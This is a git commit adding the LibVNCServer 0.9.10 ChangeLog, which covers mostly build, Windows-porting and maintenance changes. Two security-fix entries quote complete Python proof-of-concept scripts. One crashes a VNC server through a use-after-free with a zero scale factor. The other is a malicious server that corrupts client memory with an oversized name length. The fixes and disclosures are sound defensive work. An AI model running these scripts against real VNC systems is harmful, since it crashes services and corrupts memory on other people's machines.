Update ChangeLog for 0.9.10.

Christian Beier 10 years ago
parent 298a1d12e9
commit d8bc98386a

@ -1,3 +1,842 @@
2014-10-21 Christian Beier <dontmind@freeshell.org>
* NEWS: Update NEWS.
2014-10-21 Christian Beier <dontmind@freeshell.org>
* libvncserver/sockets.c: Update comments regarding
2014-10-21 Christian Beier <dontmind@freeshell.org>
* libvncserver/scale.c: Fix Use-After-Free vulnerability in
LibVNCServer wrt scaling. Reported by Ken Johnson <Ken.Johnson1@telus.com>. The vulnerability would occur in both the rfbPalmVNCSetScaleFactor
and rfbSetScale cases in the rfbProcessClientNormalMessage function
of rfbserver.c. Sending a valid scaling factor is required
(non-zero) if (msg.ssc.scale == 0) { rfbLogPerror("rfbProcessClientNormalMessage: will not
accept a scale factor of zero"); rfbCloseClient(cl); return; } rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbSetScaleMsg,
sz_rfbSetScaleMsg); rfbLog("rfbSetScale(%d)\n",
msg.ssc.scale); rfbScalingSetup(cl,cl->screen->width/msg.ssc.scale,
cl->screen->height/msg.ssc.scale); rfbSendNewScaleSize(cl); << This is the call that can trigger
a free. return; at the end, both cases there is a call the rfbSendNewScaleSize
function, where if the connection is subsequently disconnected after
sending the VNC scaling message can lead to a free occurring. else { rfbResizeFrameBufferMsg rmsg; rmsg.type = rfbResizeFrameBuffer; rmsg.pad1=0; rmsg.framebufferWidth =
Swap16IfLE(cl->scaledScreen->width); rmsg.framebufferHeigth
= Swap16IfLE(cl->scaledScreen->height); rfbLog("Sending a response
to a UltraVNC style frameuffer resize event (%dx%d)\n",
cl->scaledScreen->width, cl->scaledScreen->height); if
(rfbWriteExact(cl, (char *)&rmsg, sz_rfbResizeFrameBufferMsg) < 0) {
rfbLogPerror("rfbNewClient: write"); rfbCloseClient(cl); rfbClientConnectionGone(cl); << Call which may can lead
to a free. return FALSE; } } return TRUE; Once this function returns, eventually rfbClientConnectionGone is
called again on the return from rfbProcessClientNormalMessage. In
KRFB server this leads to an attempt to access client->data. POC script to trigger the vulnerability: ---snip--- import socket,binascii,struct,sys from time import sleep class RFB: INIT_3008 = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x30\x38\x0a" AUTH_NO_PASS = "\x01" AUTH_PASS = "\x02" SHARE_DESKTOP = "\x01" def AUTH_PROCESS(self,data,flag): if flag == 0: # Get security types secTypeCount = data[0] secType = {} for i in range(int(len(secTypeCount))): secType[i] = data[1] return secType elif flag == 1: # Get auth result # 0 means auth success # 1 means failure return data[3] def AUTH_PROCESS_CHALLENGE(self, data, PASSWORD): try: from Crypto.Cipher import DES except: print "Error importing crypto. Please fix or do not
require authentication" sys.exit(1) if len(PASSWORD) != 8: PASSWORD = PASSWORD.ljust(8, '\0') PASSWORD_SWAP =
[self.reverse_bits(ord(PASSWORD[0])),self.reverse_bits(ord(PASSWORD[1])),self.reverse_bits(ord(PASSWORD[2])),self.reverse_bits(ord(PASSWORD[3])),self.reverse_bits(ord(PASSWORD[4])),self.reverse_bits(ord(PASSWORD[5])),self.reverse_bits(ord(PASSWORD[6])),self.reverse_bits(ord(PASSWORD[7]))]PASSWORD =
(struct.pack("BBBBBBBB",PASSWORD_SWAP[0],PASSWORD_SWAP[1],PASSWORD_SWAP[2],PASSWORD_SWAP[3],PASSWORD_SWAP[4],PASSWORD_SWAP[5],PASSWORD_SWAP[6],PASSWORD_SWAP[7]))crypto = DES.new(PASSWORD) return crypto.encrypt(data) def reverse_bits(self,x): a=0 for i in range(8): a += ((x>>i)&1)<<(7-i) return a def main(argv): print "Proof of Concept" print "Copyright TELUS Security Labs" print "All Rights Reserved.\n" try: HOST = sys.argv[1] PORT = int(sys.argv[2]) except: print "Usage: python setscale_segv_poc.py <host> <port>
[password]" sys.exit(1) try: PASSWORD = sys.argv[3] except: print "No password supplied" PASSWORD = "" vnc = RFB() remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM) remote.connect((HOST,PORT)) # Get server version data = remote.recv(1024) # Send 3.8 version remote.send(vnc.INIT_3008) # Get supported security types data = remote.recv(1024) # Process Security Message secType = vnc.AUTH_PROCESS(data,0) if secType[0] == "\x02": # Send accept for password auth remote.send(vnc.AUTH_PASS) # Get challenge data = remote.recv(1024) # Send challenge response remote.send(vnc.AUTH_PROCESS_CHALLENGE(data,PASSWORD)) elif secType[0] == "\x01": # Send accept for None pass remote.send(vnc.AUTH_NO_PASS) else: print 'The server sent us something weird during auth.' sys.exit(1) # Get result data = remote.recv(1024) # Process result result = vnc.AUTH_PROCESS(data,1) if result == "\x01": # Authentication failure. data = remote.recv(1024) print 'Authentication failure. Server Reason: ' + str(data) sys.exit(1) elif result == "\x00": print "Authentication success." else: print 'Some other authentication issue occured.' sys.exit(1) # Send ClientInit remote.send(vnc.SHARE_DESKTOP) # Send malicious message print "Sending malicious data..." remote.send("\x08\x08\x00\x00") remote.close() if __name__ == "__main__": main(sys.argv) ---snap---
2014-10-14 dscho <johannes.schindelin@gmx.de>
* : Merge pull request #43 from maksqwe/fix_rfbSelectBox Fix selData.buttonWidth calculation
2014-10-10 Christian Beier <dontmind@freeshell.org>
* libvncclient/rfbproto.c: Fix possible libvncclient ServerInit
memory corruption. This fixes the following oCERT report (oCERT-2014-008 pt.2): There is a similar vulnerability to the previous one I sent. This is
related to the ServerInit message where the width, the height of the
server's framebuffer, its pixel format, and the name are sent to the
client. The name can be used in a malicious manner to trigger a
memory corruption in the client. Field Size --------------------------------- name-length
[4] name-string [name-length] Below you will find a PoC script to show the vulnerability. This was
tested on Fedora 20 with the latest version of krdc. I have noticed something, where the memory corruption causes the
program to hang but allows you to try to disconnect. After this it
hangs. Occasionally there will be segmentation fault in memcpy. This
can become more reliable if you connect to a different VNC server
first (Or the wrong port on the malicious server) then connecting to
the malicious port. Every time I accidentally made the wrong VNC
connection attempt the next time I connected it segfault'd. Just run the script it will listen on port 5900 and connect to it
with krdc for example. I have observed Remmina crash more reliably. import socket,struct,sys HOST = "" PORT = 5900 c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.bind((HOST,PORT)) c.listen(1) conn,addr = c.accept() print "Connected by ", addr protocolVersion3008 =
conn.send(protocolVersion3008) data = conn.recv(1024) # Receive the version from them. secTypeNone = "\x01\x01" secTypeAuth = "\x01\x02"
conn.send(secTypeNone) data = conn.recv(1024) # Receive the secType choice from them. secResultOk = "\x00" * 4 secResultNo = "\x00\x00\x00\x01"
conn.send(secResultOk) data = conn.recv(1024) # Receive the ClientInit (Shared-flag). frameBufferWidth = 0x0480 frameBufferHeight = 0x0360 bitsPerPixel =
0x20 depth = 0x18 bigEndian = 0x1 trueColor = 0x0 redM = 0x0 greenM
= 0x0 blueM = 0x0 redS = 0x0 greenS = 0x0 blueS = 0x0 padding =
"\x00\x00\x00" nameLength = 0xffffffff nameString = "AA" * 0xFFFF +
"\x00\x0a" conn.send( struct.pack(">HHBBBBHHHBBB",frameBufferWidth,
frameBufferHeight, bitsPerPixel, depth, bigEndian, trueColor, redM,
greenM, blueM, redS, greenS, blueS) + padding + struct.pack(">I",
nameLength) + nameString ) c.close()
2014-10-10 Christian Beier <dontmind@freeshell.org>
* libvncclient/sockets.c: Fix potential memory corruption in
libvncclient. Fixes (maybe amongst others) the following oCERT report
([oCERT-2014-008]): LibVNCServer HandleRFBServerMessage rfbServerCutText malicious
msg.sct.length It looks like there may be a chance for potential memory corruption
when a LibVNCServer client attempts to process a Server Cut Text
message. case rfbServerCutText: { char *buffer; if (!ReadFromRFBServer(client, ((char *)&msg) + 1, sz_rfbServerCutTextMsg - 1)) return FALSE; msg.sct.length = rfbClientSwap32IfLE(msg.sct.length); <<
Retrieve malicious length buffer = malloc(msg.sct.length+1); << Allocate buffer. Can
return 0x0 if (!ReadFromRFBServer(client, buffer, msg.sct.length)) <<
Attempt to write to buffer return FALSE; buffer[msg.sct.length] = 0; << Attempt to write to buffer if (client->GotXCutText) client->GotXCutText(client, buffer, msg.sct.length); <<
Attempt to write to buffer free(buffer); break; } If a message is provided with an extremely large size it is possible
to cause the malloc to fail, further leading to an attempt to write
2014-10-09 Christian Beier <dontmind@freeshell.org>
* NEWS: Update NEWS for 0.9.10.
2014-10-09 Christian Beier <dontmind@freeshell.org>
2014-10-07 dscho <johannes.schindelin@gmx.de>
* : Merge pull request #42 from LibVNC/autotools-fix-revisited Add autoconf macros that might not be installed with a usual
autotools setup
2014-10-07 Johannes Schindelin <johannes.schindelin@gmx.de>
* autogen.sh: Add back a working autogen.sh There was no reason to get rid of the convenient script. Most
developers who are not in love with autoconf fail to remember that
autoreconf invocation, therefore it is better to have something
working in place. Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2014-09-01 Nicolas Ruff <nruff@google.com>
* libvncserver/rfbserver.c: Fix stack-based buffer overflow There was a possible buffer overflow in rfbFileTransferOffer message
when processing the FileTime. Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2014-10-07 dscho <johannes.schindelin@gmx.de>
* : Merge pull request #41 from newsoft/master Fixing 2 security issues
2014-10-06 newsoft <newsoft@gmx.fr>
* libvncserver/scale.c: Make sure that no integer overflow could
occur during scaling
2014-10-06 Christian Beier <dontmind@freeshell.org>
* libvncclient/Makefile.am: Add libvncclient/h264.c to dist tarball. Otherwise the sources from a 'make dist' package wouldn't compile.
2014-10-03 Christian Beier <dontmind@freeshell.org>
* m4/.gitignore: Really add empty m4 subdirectory. This change kinda got lost with the last commit re-splitting.
2014-10-02 Christian Beier <dontmind@freeshell.org>
* : Merge pull request #38 from LibVNC/autotools-fix-revisited Autotools fix revisited.
2014-10-02 Christian Beier <dontmind@freeshell.org>
* webclients/novnc/LICENSE.txt, webclients/novnc/README.md,
webclients/novnc/include/rfb.js, webclients/novnc/include/ui.js,
webclients/novnc/include/webutil.js, webclients/novnc/vnc.html,
webclients/novnc/vnc_auto.html: Update noVNC HTML5 client to latest
version from https://github.com/kanaka/noVNC.
2014-09-21 Brian Bidulock <bidulock@openss7.org>
* .gitignore: add a few more ignores
2014-09-21 Brian Bidulock <bidulock@openss7.org>
* autogen.sh: removed autogen.sh - no longer applicable: use autoreconf -fiv
2014-10-02 Christian Beier <dontmind@freeshell.org>
* INSTALL, acinclude.m4, ltmain.sh: Remove autotools-related files
that will get installed by autoreconf -i.
2014-10-02 Brian Bidulock <bidulock@openss7.org>
* Makefile.am, configure.ac: Use an m4 script subdirectory, fix
automake init and two macro names.
2014-10-02 Brian Bidulock <bidulock@openss7.org>
* client_examples/Makefile.am, examples/Makefile.am,
examples/android/Makefile.am, libvncclient/Makefile.am,
libvncserver/Makefile.am, test/Makefile.am: Rename obsolete INCLUDES
2014-09-30 Johannes Schindelin <johannes.schindelin@gmx.de>
* libvncserver/tightvnc-filetransfer/handlefiletransferrequest.c:
Close unclosed comments ;-) Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2014-09-30 dscho <johannes.schindelin@gmx.de>
* : Merge pull request #36 from danielgindi/master A forgotten `#ifdef WIN32` broke UNIX build.
2014-09-30 dscho <johannes.schindelin@gmx.de>
* : Merge pull request #33 from danielgindi/master More MSVC adjustments, now focuses on the libvncserver
2014-09-20 Daniel Cohen Gindi <danielgindi@gmail.com>
* libvncserver/tightvnc-filetransfer/handlefiletransferrequest.c:
These are UNIX headers, and are not available on MSVC
2014-09-20 Daniel Cohen Gindi <danielgindi@gmail.com>
* rfb/rfb.h: Those are generally the windows headers, not just MinGW
2014-09-20 Daniel Cohen Gindi <danielgindi@gmail.com>
* libvncserver/rfbserver.c: On windows, use the Win32 calls for
directory enumerations. We also do not need the conversion between UNIX values to Windows
values in the RTF_FIND_DATA struct, as we already are on windows.
2014-09-20 Daniel Cohen Gindi <danielgindi@gmail.com>
* libvncserver/httpd.c, libvncserver/rfbserver.c,
libvncserver/sockets.c, rfb/rfbclient.h: Generally adjusting headers
for compiling on windows without the mixing of Winsock 1 and 2.
2014-09-20 Daniel Cohen Gindi <danielgindi@gmail.com>
* libvncserver/rfbserver.c: Just use a macro to bridge to the Win32
version of `mkdir` The additional compat_mkdir function was not necessary at all.
2014-09-20 Daniel Cohen Gindi <danielgindi@gmail.com>
* compat/msvc/sys/time.h: Use correct `winsock2.h` version header
instead of winsock.h. `windows.h` is referring to `winsock.h` (unless the
`WIN32_LEAN_AND_MEAN` is defined). The structs used in this header
are defined in `winsock2.h` or in `winsock.h`, but we are using
Winsock2 of course! So we have to include winsock2.h and refrain
from including windows.h here
2014-09-20 Daniel Cohen Gindi <danielgindi@gmail.com>
* libvncserver/httpd.c, libvncserver/rfbserver.c,
libvncserver/sockets.c: Fixed a violation of the C89 standard
("declarations must come before instructions")
2014-09-20 Daniel Cohen Gindi <danielgindi@gmail.com>
* libvncserver/tightvnc-filetransfer/filetransfermsg.c: A windows
version for directory enumerations Basically taken from https://github.com/danielgindi/FileDir with
some adjustments
2014-09-20 Daniel Cohen Gindi <danielgindi@gmail.com>
* libvncserver/tightvnc-filetransfer/filetransfermsg.c: MSVC also
has the __FUNCTION__ predefined
2014-09-20 Daniel Cohen Gindi <danielgindi@gmail.com>
* libvncserver/tightvnc-filetransfer/filetransfermsg.c,
`CreateDirectory` might clash with the
`CreateDirectoryA`/`CreateDirectoryW` macros on MSVC
2014-09-20 Daniel Cohen Gindi <danielgindi@gmail.com>
* libvncserver/tightvnc-filetransfer/filetransfermsg.c: Fail when
NULL is passed to CreateFileListInfo() Passing NULL to sprintf() would most likely crash the program.
2014-09-20 Daniel Cohen Gindi <danielgindi@gmail.com>
* libvncclient/rfbproto.c, libvncclient/vncviewer.c,
libvncserver/rfbserver.c, libvncserver/sockets.c,
libvncserver/stats.c, libvncserver/websockets.c: `strings.h` and
`resolv.h` are not available on MSVC, and some POSIX functions are
renamed or deprecated For all of those missing/deprecated POSIX functions, we just add a
macro mapping to the _underscored version of MSVC.
2014-09-09 Christian Beier <dontmind@freeshell.org>
* client_examples/Makefile.am: The HAVE_X11 define is not there
anymore, but we don't need it either.
2014-09-09 Christian Beier <dontmind@freeshell.org>
* Makefile.am, configure.ac, vncterm/ChangeLog, vncterm/LinuxVNC.c,
vncterm/Makefile.am, vncterm/README, vncterm/TODO,
vncterm/VNCommand.c, vncterm/VNConsole.c, vncterm/VNConsole.h,
vncterm/example.c, vncterm/vga.h: Move vncterm to
2014-09-09 Christian Beier <dontmind@freeshell.org>
* VisualNaCro/.gitignore, VisualNaCro/AUTHORS,
VisualNaCro/ChangeLog, VisualNaCro/Makefile.am, VisualNaCro/NEWS,
VisualNaCro/README, VisualNaCro/autogen.sh,
VisualNaCro/configure.ac, VisualNaCro/default8x16.h,
VisualNaCro/nacro.c, VisualNaCro/nacro.h, VisualNaCro/recorder.pl:
Move VisualNaCro to https://github.com/LibVNC/VisualNaCro.
2014-09-09 Christian Beier <dontmind@freeshell.org>
* prepare_x11vnc_dist.sh: Move prepare_x11vnc_dist.sh over to x11vnc
2014-09-03 Christian Beier <dontmind@freeshell.org>
* Makefile.am, configure.ac: Remove x11vnc from autotools build
2014-09-03 Christian Beier <dontmind@freeshell.org>
* tightvnc-1.3dev5-vncviewer-alpha-cursor.patch: Remove
2014-09-03 Christian Beier <dontmind@freeshell.org>
* x11vnc/.cvsignore, x11vnc/8to24.c, x11vnc/8to24.h,
x11vnc/ChangeLog, x11vnc/Makefile.am, x11vnc/README,
x11vnc/RELEASE-NOTES, x11vnc/allowed_input_t.h, x11vnc/appshare.c,
x11vnc/avahi.c, x11vnc/avahi.h, x11vnc/blackout_t.h,
x11vnc/cleanup.c, x11vnc/cleanup.h, x11vnc/connections.c,
x11vnc/connections.h, x11vnc/cursor.c, x11vnc/cursor.h,
x11vnc/enc.h, x11vnc/enums.h, x11vnc/gui.c, x11vnc/gui.h,
x11vnc/help.c, x11vnc/help.h, x11vnc/inet.c, x11vnc/inet.h,
x11vnc/keyboard.c, x11vnc/keyboard.h, x11vnc/linuxfb.c,
x11vnc/linuxfb.h, x11vnc/macosx.c, x11vnc/macosx.h,
x11vnc/macosxCG.c, x11vnc/macosxCG.h, x11vnc/macosxCGP.c,
x11vnc/macosxCGP.h, x11vnc/macosxCGS.c, x11vnc/macosxCGS.h,
x11vnc/macosx_opengl.c, x11vnc/macosx_opengl.h,
x11vnc/misc/.cvsignore, x11vnc/misc/LICENSE,
x11vnc/misc/Makefile.am, x11vnc/misc/README, x11vnc/misc/Xdummy,
x11vnc/misc/blockdpy.c, x11vnc/misc/connect_switch,
x11vnc/misc/desktop.cgi, x11vnc/misc/dtVncPopup,
x11vnc/misc/inet6to4, x11vnc/misc/panner.pl,
x11vnc/misc/qt_tslib_inject.pl, x11vnc/misc/ranfb.pl,
x11vnc/misc/rx11vnc, x11vnc/misc/rx11vnc.pl, x11vnc/misc/shm_clear,
x11vnc/misc/slide.pl, x11vnc/misc/turbovnc/Makefile.am,
x11vnc/misc/turbovnc/README, x11vnc/misc/turbovnc/apply_turbovnc,
x11vnc/misc/turbovnc/tight.c, x11vnc/misc/turbovnc/turbojpeg.h,
x11vnc/misc/turbovnc/undo_turbovnc, x11vnc/misc/uinput.pl,
x11vnc/misc/ultravnc_repeater.pl, x11vnc/misc/vcinject.pl,
x11vnc/misc/x11vnc_loop, x11vnc/misc/x11vnc_pw, x11vnc/nox11.h,
x11vnc/nox11_funcs.h, x11vnc/options.c, x11vnc/options.h,
x11vnc/params.h, x11vnc/pm.c, x11vnc/pm.h, x11vnc/pointer.c,
x11vnc/pointer.h, x11vnc/rates.c, x11vnc/rates.h, x11vnc/remote.c,
x11vnc/remote.h, x11vnc/scan.c, x11vnc/scan.h, x11vnc/screen.c,
x11vnc/screen.h, x11vnc/scrollevent_t.h, x11vnc/selection.c,
x11vnc/selection.h, x11vnc/solid.c, x11vnc/solid.h,
x11vnc/sslcmds.c, x11vnc/sslcmds.h, x11vnc/sslhelper.c,
x11vnc/sslhelper.h, x11vnc/ssltools.h, x11vnc/tkx11vnc,
x11vnc/tkx11vnc.h, x11vnc/uinput.c, x11vnc/uinput.h,
x11vnc/unixpw.c, x11vnc/unixpw.h, x11vnc/user.c, x11vnc/user.h,
x11vnc/userinput.c, x11vnc/userinput.h, x11vnc/util.c,
x11vnc/util.h, x11vnc/v4l.c, x11vnc/v4l.h, x11vnc/win_utils.c,
x11vnc/win_utils.h, x11vnc/winattr_t.h, x11vnc/x11vnc.1,
x11vnc/x11vnc.c, x11vnc/x11vnc.desktop, x11vnc/x11vnc.h,
x11vnc/x11vnc_defs.c, x11vnc/xdamage.c, x11vnc/xdamage.h,
x11vnc/xevents.c, x11vnc/xevents.h, x11vnc/xinerama.c,
x11vnc/xinerama.h, x11vnc/xkb_bell.c, x11vnc/xkb_bell.h,
x11vnc/xrandr.c, x11vnc/xrandr.h, x11vnc/xrecord.c,
x11vnc/xrecord.h, x11vnc/xwrappers.c, x11vnc/xwrappers.h: Remove
x11vnc subdir. The new x11vnc repo is at https://github.com/LibVNC/x11vnc.
2014-09-02 Johannes Schindelin <johannes.schindelin@gmx.de>
* libvncclient/tls_openssl.c: Fix tv_usec calculation This bug was introduced in the MSVC patches. Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2014-08-29 Daniel Cohen Gindi <danielgindi@gmail.com>
* libvncclient/tls_openssl.c: Use Windows' critical sections to
emulate pthread's mutexes With Microsoft Visual C++, we cannot use pthreads (MinGW sports an
emulation library which is the reason we did not need
Windows-specific hacks earlier). Happily, it is very easy to provide
Windows-specific emulations for the pthread calls we use. [JES: fixed commit message] Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2014-08-29 Daniel Cohen Gindi <danielgindi@gmail.com>
* libvncclient/zrle.c: Perform pointer arithmetic on char * instead
of void * Microsoft Visual C++ does not allow pointer arithmetic on void
pointers. [JES: fixed commit message] Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2014-08-29 Daniel Cohen Gindi <danielgindi@gmail.com>
* libvncclient/tls_openssl.c, rfb/rfbproto.h: MSVC: Use the Unix
emulation headers [JES: provided commit message, split out unrelated changes] Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2014-08-29 Daniel Cohen Gindi <danielgindi@gmail.com>
* libvncclient/listen.c, libvncclient/sockets.c,
libvncclient/vncviewer.c: Use WIN32 for Windows-specific #ifdef
guards To support Microsoft Visual C++, we must not guard Windows-specific
code in MinGW-specific #ifdef guards. Happily, even 64-bit MSVC defines the WIN32 constant, therefore we
can use that instead. [JES: fixed commit message, reordered commit, split out unrelated
changes] Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2014-08-29 Daniel Cohen Gindi <danielgindi@gmail.com>
* compat/msvc/stdint.h, compat/msvc/sys/time.h,
compat/msvc/unistd.h: Add MSVC compatible unix headers The stdint.h file was copied from:
https://runexe.googlecode.com/svn-history/r9/trunk/src/runlib/msstdint.h(we can incorporate it because it is licensed under the 3-clause BSD
license.) [JES: fixed commit message, fixed stripped copyright header] Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2014-09-01 Daniel Cohen Gindi <danielgindi@gmail.com>
* libvncclient/rfbproto.c, libvncclient/sockets.c,
libvncclient/tls_openssl.c: MSVC: Use _snprintf instead of snprintf In Microsoft's Visual C runtime, the snprintf() function is actually
called _snprintf. Let's just #define the former to call the latter. [JES: fixed commit message] Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2014-09-01 Daniel Cohen Gindi <danielgindi@gmail.com>
* rfb/rfbproto.h: Use correct winsock header We link to ws2_32.lib which corresponds to the winsock2.h header,
not the winsock.h header. [JES: fixed commit message] Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2014-08-29 Daniel Cohen Gindi <danielgindi@gmail.com>
* libvncclient/vncviewer.c: Include Winsock2 header before windows.h
include That's because there are duplicate #defines, and when Winsock2 is
defined before windows.h then windows.h detects that and prevent
redefinition. See
http://social.msdn.microsoft.com/Forums/windowsdesktop/en-US/4a90b143-1fb8-43e9-a54c-956127e0c579/windowsh-and-winsock2h?forum=windowssdk[JES: fixed commit message] Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2014-09-01 Daniel Cohen Gindi <danielgindi@gmail.com>
* libvncclient/tls_openssl.c: Remove unused variables This change is technically not required to support MSVC, but it was
detected by Microsoft's compiler. [JES: fixed commit message] Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2014-08-26 dscho <johannes.schindelin@gmx.de>
* : Merge pull request #21 from newsoft/master Fixing two more security issues (remote server crash)
2014-08-18 Nicolas Ruff <nruff@google.com>
* libvncserver/rfbserver.c: Check malloc() return value on
client->server ClientCutText message. Client can send up to 2**32-1
bytes of text, and such a large allocation is likely to fail in case
of high memory pressure. This would in a server crash (write at
address 0).
2014-08-16 dscho <johannes.schindelin@gmx.de>
* : Merge pull request #16 from sandsmark/master Merge patches from KDE/krfb
2014-08-16 Johannes Schindelin <johannes.schindelin@gmx.de>
* acinclude.m4: Fix whitespace Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2014-08-10 Luca Falavigna <dktrkranz@debian.org>
* acinclude.m4: Enable support for ppc64el architecture
2014-08-10 Luca Falavigna <dktrkranz@debian.org>
* libvncclient.pc.in, libvncserver.pc.in: Use Libs.private to avoid
unnecessary linkage
2014-08-16 Johannes Schindelin <johannes.schindelin@gmx.de>
* libvncclient/rfbproto.c, libvncclient/vncviewer.c: Fix indentation Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2014-08-16 dscho <johannes.schindelin@gmx.de>
* : Merge pull request #20 from newsoft/master Fix integer overflow in MallocFrameBuffer()
2014-08-15 newsoft <newsoft@MacBook-Air-de-newsoft-2.local>
* libvncclient/vncviewer.c: Fix integer overflow in
MallocFrameBuffer() Promote integers to uint64_t to avoid integer overflow issue during
frame buffer allocation for very large screen sizes
2013-09-28 Amandeep Singh <aman.dedman@gmail.com>
* libvncserver/sockets.c: allow rfbInitSockets with non-ready
states. This allows for reinitializations of e. g. sockets in a SHUTDOWN
state. The only state that doesn't make sense to reinitialize are
READY states.
2013-10-09 Amandeep Singh <aman.dedman@gmail.com>
* libvncserver/main.c: Fix crash in krfb Krfb crashes on quit, if any client is connected due to a
rfbClientConnectionGone call missing
2014-07-10 Will Thompson <will@willthompson.co.uk>
* x11vnc/xrandr.c: x11vnc: fix double X_UNLOCK on xrandr events check_xrandr_event() assumes X_LOCK is taken before it is called,
and currently calls X_UNLOCK on behalf of the caller. But in
practice, all callers assume that the lock is still held after
check_xrandr_event() returns. In particular, this leads to a
double-unlock and crash in check_xevents() on any xrandr event.
2014-07-18 dscho <johannes.schindelin@gmx.de>
* : Merge pull request #13 from
wjt/fix-double-X_UNLOCK-on-xrandr-event x11vnc: fix double X_UNLOCK on xrandr events
2014-06-27 Johannes Schindelin <johannes.schindelin@gmx.de>
* common/lzoconf.h, common/lzodefs.h, common/minilzo.c,
common/minilzo.h: Update LZO to version 2.07 It was reported that LZO has security issues in LMS-2014-06-16-1:
Oberhumer LZO (CVE-2014-4607):
http://seclists.org/oss-sec/2014/q2/665 This was also reported by Alex Xu as
https://github.com/LibVNC/libvncserver/issues/9. Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2014-06-23 dscho <johannes.schindelin@gmx.de>
* : Merge pull request #7 from waldheinz/init-sfae-padding Initialize padding in SetFormatAndEncodings' rfbSetPixelFormatMsg.
2014-06-23 Matthias Treydte <mt@waldheinz.de>
* libvncclient/rfbproto.c: Initialize padding in
SetFormatAndEncodings' rfbSetPixelFormatMsg.
2014-06-23 Matthias Treydte <mt@waldheinz.de>
* CMakeLists.txt: Use CMAKE_CURRENT_*_DIR instead of CMAKE_*_DIR. This makes the library friendly to use as a git submodule within
another project, and should change nothing when compiled alone. For example when having a directory structure like
"my_project/external/libvnc", where in libvnc resides a checkout of
libvncserver, one can just reference that directory from the
CMakeLists.txt in my_project with > add_directory ( external/libvnc ) and add vncclient / vncserver in my_project's taret_link_libraries,
one can just hack away without having to manually make / install
LibVNCServer whenever something is changed there.
2014-05-14 dscho <johannes.schindelin@gmx.de>
* : Merge pull request #4 from dextero/master x11vnc: adjust blackout region coordinates to the clipping region
2014-04-05 Johannes Schindelin <johannes.schindelin@gmx.de>
* libvncclient/rfbproto.c: libvncclient: If we have TLS support,
enable VeNCrypt by default Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2014-04-05 Johannes Schindelin <johannes.schindelin@gmx.de>
* .gitignore: Ignore the 'mac' example, too Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2014-04-05 Johannes Schindelin <johannes.schindelin@gmx.de>
* .gitignore: Ignore the vencrypt document https://www.berrange.com/~dan/vencrypt.txt Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2014-04-05 Johannes Schindelin <johannes.schindelin@gmx.de>
* .gitignore: Ignore rfbproto.rst A more up-to-date version of the RFB protocol is maintained by
http://sourceforge.net/p/tigervnc/code/HEAD/tree/rfbproto/rfbproto.rstSigned-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2014-03-29 Johannes Schindelin <johannes.schindelin@gmx.de>
* examples/repeater.c: Repeater example: show how to shut down
cleanly Since we connected to the client through the repeater, chances are
that we want this server shut down once the client disconnected. Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2014-03-29 Johannes Schindelin <johannes.schindelin@gmx.de>
* .gitignore, examples/Makefile.am, examples/repeater.c: Add an
example how to connect to an UltraVNC-style repeater UltraVNC offers an add-on to connect clients and servers via IDs
with a so-called repeater (e.g. to bridge firewalled clients and
servers): http://www.uvnc.com/products/uvnc-repeater.html This example demonstrates how to use that feature with a
LibVNCServer-based server. Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2014-04-05 Christian Beier <dontmind@freeshell.org>
* configure.ac, webclients/novnc/README.md,
webclients/novnc/vnc.html: Update sourceforge links to point to
2014-03-31 Johannes Schindelin <johannes.schindelin@gmx.de>
* libvncserver/rfbregion.c: Fix tyop Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2014-03-30 Johannes Schindelin <johannes.schindelin@gmx.de>
* .gitignore: Ignore more generated files While at it, also ignore the documentation of the RFB protocol best
downloaded manually from http://www.realvnc.com/docs/rfbproto.pdf Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2014-03-30 Robbert Klarenbeek <robbertkl@users.sourceforge.net>
* libvncclient/vncviewer.c: Address #12 ClientData does not get
freed rfbClientSetClientData() allocates a new rfbClientData, but never
gets cleaned up, which causes memory leaks. Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2014-03-30 Johannes Schindelin <johannes.schindelin@gmx.de>
* examples/example.c, test/encodingstest.c: After free()ing
clientData, set it to NULL We will change rfbClientCleanup() to free the data. Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2013-02-27 Joel Martin <github@martintribe.org>
* libvncserver/websockets.c: Set opcode correctly for binary frames.
2013-01-25 Christian Beier <dontmind@freeshell.org>
* rfb/rfbproto.h: Remove unneeded #ifdefs.
2013-01-25 Christian Beier <dontmind@freeshell.org>
* rfb/rfbclient.h: Fix ABI compatibility issue.
2013-01-09 David Verbeiren <david.verbeiren@intel.com>
* client_examples/gtkvncviewer.c, configure.ac,
libvncclient/Makefile.am, libvncclient/h264.c,
libvncclient/rfbproto.c, libvncclient/vncviewer.c, rfb/rfbclient.h,
rfb/rfbproto.h: LibVNCClient: Add H.264 encoding for framebuffer
updates This patch implements support in LibVNCClient for framebuffer
updates encoded as H.264 frames. Hardware accelerated decoding is
performed using VA API. This is experimental support to let the community explore the
possibilities offered by the potential bandwidth and latency
reductions that H.264 encoding allows. This may be particularly
useful for use cases such as online gaming, hosted desktops, hosted
